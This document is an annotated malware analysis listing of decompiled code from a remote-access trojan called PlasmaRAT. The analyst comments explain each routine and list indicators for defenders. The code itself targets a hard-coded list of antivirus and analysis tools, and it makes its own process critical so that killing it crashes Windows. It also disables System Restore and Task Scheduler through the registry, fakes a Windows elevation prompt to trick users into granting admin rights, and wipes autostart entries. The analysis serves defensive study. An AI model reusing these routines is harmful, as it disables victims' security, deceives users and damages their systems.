// Analyst summary: entry point of the sample's security-tool tampering routine.
// - Not elevated (AntiEverything.IsAdmin() is false): hands off to CheckAV.RunAVAdminMode() and does nothing else.
// - Elevated: calls AVKill.searchav on %PROGRAMDATA% and on the Program Files folder, then
//   AVKill.ProtectMyFile() and AVKill.AVProcSearcher(), then AVKill.FuckFileName once per
//   hard-coded executable name. The names belong to security products and analysis tools
//   (e.g. MsMpEng.exe, mbam.exe, wireshark.exe), plus rstrui.exe.
// - None of the AVKill helpers is visible in this listing, so what is actually done to each
//   name is not established here. NOTE(review): confirm against the helper bodies.
// - The outer catch is empty, so any exception is swallowed and a partial run surfaces no error.
// Defender note: the literal name list is a stable static indicator for this sample. At runtime,
// watch for one process touching many of these security-tool image names in a short window.
// Token: 0x0600004B RID: 75 RVA: 0x00005120 File Offset: 0x00003320 public static void Start() { try { if (!AntiEverything.IsAdmin()) { CheckAV.RunAVAdminMode(); } else { AVKill.searchav(Environment.GetEnvironmentVariable("PROGRAMDATA")); AVKill.ProtectMyFile(); AVKill.searchav(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles)); AVKill.AVProcSearcher(); AVKill.FuckFileName("rstrui.exe"); AVKill.FuckFileName("AvastSvc.exe"); AVKill.FuckFileName("avconfig.exe"); AVKill.FuckFileName("AvastUI.exe"); AVKill.FuckFileName("avscan.exe"); AVKill.FuckFileName("instup.exe"); AVKill.FuckFileName("mbam.exe"); AVKill.FuckFileName("mbamgui.exe"); AVKill.FuckFileName("mbampt.exe"); AVKill.FuckFileName("mbamscheduler.exe"); AVKill.FuckFileName("mbamservice.exe"); AVKill.FuckFileName("hijackthis.exe"); AVKill.FuckFileName("spybotsd.exe"); AVKill.FuckFileName("ccuac.exe"); AVKill.FuckFileName("avcenter.exe"); AVKill.FuckFileName("avguard.exe"); AVKill.FuckFileName("avgnt.exe"); AVKill.FuckFileName("avgui.exe"); AVKill.FuckFileName("avgcsrvx.exe"); AVKill.FuckFileName("avgidsagent.exe"); AVKill.FuckFileName("avgrsx.exe"); AVKill.FuckFileName("avgwdsvc.exe"); AVKill.FuckFileName("egui.exe"); AVKill.FuckFileName("zlclient.exe"); AVKill.FuckFileName("bdagent.exe"); AVKill.FuckFileName("keyscrambler.exe"); AVKill.FuckFileName("avp.exe"); AVKill.FuckFileName("wireshark.exe"); AVKill.FuckFileName("ComboFix.exe"); AVKill.FuckFileName("MSASCui.exe"); AVKill.FuckFileName("MpCmdRun.exe"); AVKill.FuckFileName("msseces.exe"); AVKill.FuckFileName("MsMpEng.exe"); AVKill.FuckFileName("blindman.exe"); AVKill.FuckFileName("SDFiles.exe"); AVKill.FuckFileName("SDMain.exe"); AVKill.FuckFileName("SDWinSec.exe"); } } catch (Exception ex) { } }
// Analyst summary: clears the "critical process" flag on the current process.
// - Acts only when PlasmaRAT.WhatToRun contains "c" and AntiEverything.IsAdmin() is true.
// - Calls SetProcCritical.NtSetInformationProcess(currentProcessHandle, 29, ref 0, 4). Information
//   class 29 is ProcessBreakOnTermination; writing 0 removes the critical marking, so the process
//   can exit without the OS treating it as a fatal system error.
// - In this listing the method is wired to SystemEvents.SessionEnding by CriticalProcess(), so the
//   flag is dropped at logoff/shutdown.
// Reading aid: the IL_xx labels, the num/num2/num5 bookkeeping, the @switch(...) placeholders and
// `catch when(endfilter(...))` are decompiler output consistent with VB.NET unstructured error
// handling (On Error Resume Next style). They are not hand-written logic, and the text does not
// compile as C# (e.g. `obj` is declared but `obj2` is used).
// Token: 0x060000D0 RID: 208 RVA: 0x0000C0C4 File Offset: 0x0000A2C4 public static void NonCriticalProcess() { int num; int num5; object obj; try { IL_00: ProjectData.ClearProjectError(); num = 1; IL_07: int num2 = 2; if (!PlasmaRAT.WhatToRun.Contains("c")) { goto IL_3C; } IL_1A: num2 = 3; if (!AntiEverything.IsAdmin()) { goto IL_3C; } IL_23: num2 = 4; IntPtr handle = Process.GetCurrentProcess().Handle; int processInformationClass = 29; int num3 = 0; SetProcCritical.NtSetInformationProcess(handle, processInformationClass, ref num3, 4); IL_3C: goto IL_A7; IL_3E: int num4 = num5 + 1; num5 = 0; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num4); IL_68: goto IL_9C; IL_6A: num5 = num2; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num); IL_7A :; } catch when(endfilter(obj is Exception & num != 0 & num5 == 0)) { Exception ex = (Exception)obj2; goto IL_6A; } IL_9C: throw ProjectData.CreateProjectError(-2146828237); IL_A7: if (num5 != 0) { ProjectData.ClearProjectError(); } }
// Analyst summary: marks the current process as a critical process (anti-termination).
// - Acts only when AntiEverything.IsAdmin() is true; otherwise jumps straight to the exit label.
// - Subscribes a SystemEvents.SessionEnding handler that calls SetProcCritical.NonCriticalProcess(),
//   i.e. the flag is meant to be removed again when the user session ends.
// - Calls SetProcCritical.NtSetInformationProcess(currentProcessHandle, 29, ref 1, 4). Information
//   class 29 is ProcessBreakOnTermination; with the value 1, terminating the process is treated by
//   Windows as a critical failure. The return value of the call is not checked.
// Defender note: a user-mode process outside the OS's own set marking itself critical is a strong
// behavioural signal. For triage, suspend or isolate before terminating such a process.
// Reading aid: the IL_xx labels, the num/num2/num5 bookkeeping, the @switch(...) placeholders and
// `catch when(endfilter(...))` are decompiler output consistent with VB.NET unstructured error
// handling. They are not hand-written logic, and the text does not compile as C#.
// Token: 0x060000CF RID: 207 RVA: 0x0000BFFC File Offset: 0x0000A1FC public static void CriticalProcess() { int num; int num5; object obj; try { IL_00: ProjectData.ClearProjectError(); num = 1; IL_07: int num2 = 2; if (!AntiEverything.IsAdmin()) { goto IL_3C; } IL_10: num2 = 3; SystemEvents.SessionEnding += delegate(object sender, SessionEndingEventArgs e) { SetProcCritical.NonCriticalProcess(); }; IL_23: num2 = 4; IntPtr handle = Process.GetCurrentProcess().Handle; int processInformationClass = 29; int num3 = 1; SetProcCritical.NtSetInformationProcess(handle, processInformationClass, ref num3, 4); IL_3C: goto IL_A3; IL_3E: int num4 = num5 + 1; num5 = 0; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num4); IL_64: goto IL_98; IL_66: num5 = num2; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num); IL_76 :; } catch when(endfilter(obj is Exception & num != 0 & num5 == 0)) { Exception ex = (Exception)obj2; goto IL_66; } IL_98: throw ProjectData.CreateProjectError(-2146828237); IL_A3: if (num5 != 0) { ProjectData.ClearProjectError(); } }
// Analyst summary: registry tampering that reduces visibility and removes recovery options.
// Always (per-user, no elevation needed):
//   HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced : ShowSuperHidden = 0
//     (Explorer stops showing protected operating-system files).
// Only when AntiEverything.IsAdmin() is true:
//   HKLM\Software\Microsoft\Windows Script Host\Settings : value literally named "REG_DWORD" = 1
//     NOTE(review): the value name is the string "REG_DWORD"; whether this write has any effect
//     on Windows Script Host is not established by this listing.
//   HKLM\SYSTEM\CurrentControlSet\Services\Schedule : Start = 4 (service start type "disabled").
//   HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore : DisableSR = 1.
// All four values are passed as strings with RegistryValueKind.DWord.
// Defender note: each of these writes is a discrete detection point for registry auditing. During
// remediation, check and restore all four values rather than only removing the binary.
// Reading aid: the IL_xx labels, the num/num2/num4 bookkeeping, the @switch(...) placeholders and
// `catch when(endfilter(...))` are decompiler output consistent with VB.NET unstructured error
// handling (a failing write appears to be skipped rather than aborting); this is not compilable C#.
// Token: 0x06000086 RID: 134 RVA: 0x00008988 File Offset: 0x00006B88 public static void Disable() { int num; int num4; object obj; try { IL_00: ProjectData.ClearProjectError(); num = 1; IL_07: int num2 = 2; MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", "ShowSuperHidden", "0", RegistryValueKind.DWord); IL_28: num2 = 3; if (!AntiEverything.IsAdmin()) { goto IL_94; } IL_31: num2 = 4; MyProject.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows Script Host\\Settings", "REG_DWORD", "1", RegistryValueKind.DWord); IL_52: num2 = 5; MyProject.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Schedule", "Start", "4", RegistryValueKind.DWord); IL_73: num2 = 6; MyProject.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore", "DisableSR", "1", RegistryValueKind.DWord); IL_94: goto IL_103; IL_96: int num3 = num4 + 1; num4 = 0; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3); IL_C4: goto IL_F8; IL_C6: num4 = num2; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num); IL_D6 :; } catch when(endfilter(obj is Exception & num != 0 & num4 == 0)) { Exception ex = (Exception)obj2; goto IL_C6; } IL_F8: throw ProjectData.CreateProjectError(-2146828237); IL_103: if (num4 != 0) { ProjectData.ClearProjectError(); } }
// Analyst summary: socially-engineered elevation request, run once per user profile.
// Preconditions (all must hold): the process is NOT elevated, PlasmaRAT.GetAntiVirus() does not
// return "AntiVirus: N/A", and the VB setting (app "Microsoft", section "Sysinternals", key "AV")
// is not already "ran".
// Behaviour visible here:
// - Copies the running executable to <temp path>\HardwareCheck.exe if that file does not exist.
// - Starts cmd.exe with Verb = "runas", UseShellExecute = true and a hidden window. The argument
//   string is "/c <copy path>" followed by a block of text claiming Windows detected a software
//   change, plus the user name, processor count and OS name. That text is not a command; it
//   presumably exists to be displayed in the consent dialog. TODO confirm on a test system.
// - On a successful start it stores "ran" via Interaction.SaveSetting and calls
//   PlasmaRAT.TalktoChannel with an "AV Killer: Targeted ..." message (the reporting path is
//   not shown in this listing).
// - Both catch blocks are empty; a declined prompt or a failed copy is silently ignored, and the
//   "ran" marker is not written in that case, so the prompt can recur on a later call.
// Defender note: useful indicators are HardwareCheck.exe in the user's temp directory, an elevation
// request for cmd.exe whose command line contains multi-line prose, and the SaveSetting marker
// (VB stores these under the per-user "VB and VBA Program Settings" registry key).
// Token: 0x06000043 RID: 67 RVA: 0x00004C78 File Offset: 0x00002E78 public static void RunAVAdminMode() { try { string text = Path.GetTempPath() + "HardwareCheck.exe"; if (!AntiEverything.IsAdmin() && Operators.CompareString(PlasmaRAT.GetAntiVirus(), "AntiVirus: N/A", false) != 0 && Operators.CompareString(Interaction.GetSetting("Microsoft", "Sysinternals", "AV", ""), "ran", false) != 0) { if (!File.Exists(text)) { File.Copy(Application.ExecutablePath, text); } ProcessStartInfo processStartInfo = new ProcessStartInfo("cmd.exe", string.Concat(new string[] { "/c ", text, "\r\n\r\n Windows has detected a recent software change and needs permissions to continue. This process will take about 30-60 seconds depending on your internet connection. Please hit Yes to continue.\r\n\r\nSystem Info:\r\nAccount: ", Environment.UserName.ToString().ToString(), "\r\nProcessor Count: ", Environment.ProcessorCount.ToString(), "\r\nOperating System: ", MyProject.Computer.Info.OSFullName })); processStartInfo.WindowStyle = ProcessWindowStyle.Hidden; processStartInfo.UseShellExecute = true; processStartInfo.WorkingDirectory = Environment.CurrentDirectory; processStartInfo.Verb = "runas"; try { Process.Start(processStartInfo); Interaction.SaveSetting("Microsoft", "Sysinternals", "AV", "ran"); PlasmaRAT.TalktoChannel("AV Killer: Targeted " + PlasmaRAT.GetAntiVirus(), string.Empty); } catch (Exception ex) { } } } catch (Exception ex2) { } }
// Analyst summary: "bot killer" sweep over the usual autostart locations, presumably aimed at
// competing malware; the helper bodies are not shown, so the selection criteria are unknown here.
// - Does nothing if AntiEverything.AntisDetected is set.
// - Otherwise, in order: BotKillers.RunStartupKiller(); HardBK.KillKeys on the HKCU Run and RunOnce
//   keys (opened writable); BotKillers.KillFile on the user's Startup folder path; when
//   AntiEverything.IsAdmin() is true, HardBK.KillKeys on the HKLM Run and RunOnce keys as well;
//   then BotKillers.ScanProcess() and a "BK: Hard Bot Killer Ran Successfully!" message through
//   PlasmaRAT.TalktoChannel.
// - OpenSubKey can return null when a key is absent; how KillKeys handles that is not visible.
// - The returned `obj3` is never assigned in this listing. That looks like a decompiler rendering
//   of a VB function with no explicit return value, so callers should not rely on the result.
// Incident-response note: because this routine edits Run/RunOnce and the Startup folder, missing
// legitimate autostart entries on an affected host may be collateral damage from this sample.
// Reading aid: the IL_xx labels, the num/num2/num4 bookkeeping, the @switch(...) placeholders and
// `catch when(endfilter(...))` are decompiler output consistent with VB.NET unstructured error
// handling; this is not compilable C#.
// Token: 0x0600005C RID: 92 RVA: 0x0000602C File Offset: 0x0000422C public static object HardBotKill() { int num; int num4; object obj; try { IL_00: ProjectData.ClearProjectError(); num = 1; IL_07: int num2 = 2; if (AntiEverything.AntisDetected) { goto IL_AB; } IL_13: num2 = 3; BotKillers.RunStartupKiller(); IL_1A: num2 = 4; HardBK.KillKeys(Registry.CurrentUser.OpenSubKey("software\\Microsoft\\Windows\\CurrentVersion\\Run", true)); IL_32: num2 = 5; HardBK.KillKeys(Registry.CurrentUser.OpenSubKey("software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", true)); IL_4A: num2 = 6; BotKillers.KillFile(Environment.GetFolderPath(Environment.SpecialFolder.Startup)); IL_57: num2 = 7; if (!AntiEverything.IsAdmin()) { goto IL_91; } IL_60: num2 = 8; HardBK.KillKeys(Registry.LocalMachine.OpenSubKey("software\\Microsoft\\Windows\\CurrentVersion\\Run", true)); IL_78: num2 = 9; HardBK.KillKeys(Registry.LocalMachine.OpenSubKey("software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", true)); IL_91: num2 = 11; BotKillers.ScanProcess(); IL_99: num2 = 12; PlasmaRAT.TalktoChannel("BK: Hard Bot Killer Ran Successfully!", string.Empty); IL_AB: goto IL_135; IL_B0: int num3 = num4 + 1; num4 = 0; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3); IL_F6: goto IL_12A; IL_F8: num4 = num2; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num); IL_108 :; } catch when(endfilter(obj is Exception & num != 0 & num4 == 0)) { Exception ex = (Exception)obj2; goto IL_F8; } IL_12A: throw ProjectData.CreateProjectError(-2146828237); IL_135: object obj3; object result = obj3; if (num4 != 0) { ProjectData.ClearProjectError(); } return(result); }
// Analyst summary: walks autostart locations and hands each entry to a "kill" helper.
// - Calls BotKillers.StartupFucker for the Run and RunOnce sub-paths with selector 1, and, only
//   when AntiEverything.IsAdmin() is true, again with selector 2. The selector presumably picks
//   the registry hive (per-user vs machine-wide). TODO confirm in StartupFucker.
// - Enumerates every file in the user's Startup folder with Directory.GetFiles and passes each
//   path to BotKillers.KillFile; what KillFile decides or does is not shown in this listing.
// Incident-response note: entries removed from Run/RunOnce or the Startup folder by this routine
// will not be restored by deleting the sample; compare against a known-good baseline.
// Reading aid: the IL_xx labels, the num/num2/num4 bookkeeping, the @switch(...) placeholders and
// `catch when(endfilter(...))` are decompiler output consistent with VB.NET unstructured error
// handling (a failing step appears to be skipped rather than aborting the sweep); this is not
// compilable C#.
// Token: 0x06000058 RID: 88 RVA: 0x00005C48 File Offset: 0x00003E48 public static void RunStartupKiller() { int num; int num4; object obj; try { IL_00: ProjectData.ClearProjectError(); num = 1; IL_07: int num2 = 2; BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 1); IL_14: num2 = 3; BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\", 1); IL_21: num2 = 4; if (!AntiEverything.IsAdmin()) { goto IL_44; } IL_2A: num2 = 5; BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 2); IL_37: num2 = 6; BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\", 2); IL_44: num2 = 8; string[] files = Directory.GetFiles(Environment.GetFolderPath(Environment.SpecialFolder.Startup)); IL_52: num2 = 9; string[] array = files; int i = 0; while (i < array.Length) { string location = array[i]; IL_66: num2 = 10; BotKillers.KillFile(location); i++; IL_76: num2 = 11; } IL_80: goto IL_106; IL_85: int num3 = num4 + 1; num4 = 0; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3); IL_C5: goto IL_FB; IL_C7: num4 = num2; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num); IL_D8 :; } catch when(endfilter(obj is Exception & num != 0 & num4 == 0)) { Exception ex = (Exception)obj2; goto IL_C7; } IL_FB: throw ProjectData.CreateProjectError(-2146828237); IL_106: if (num4 != 0) { ProjectData.ClearProjectError(); } }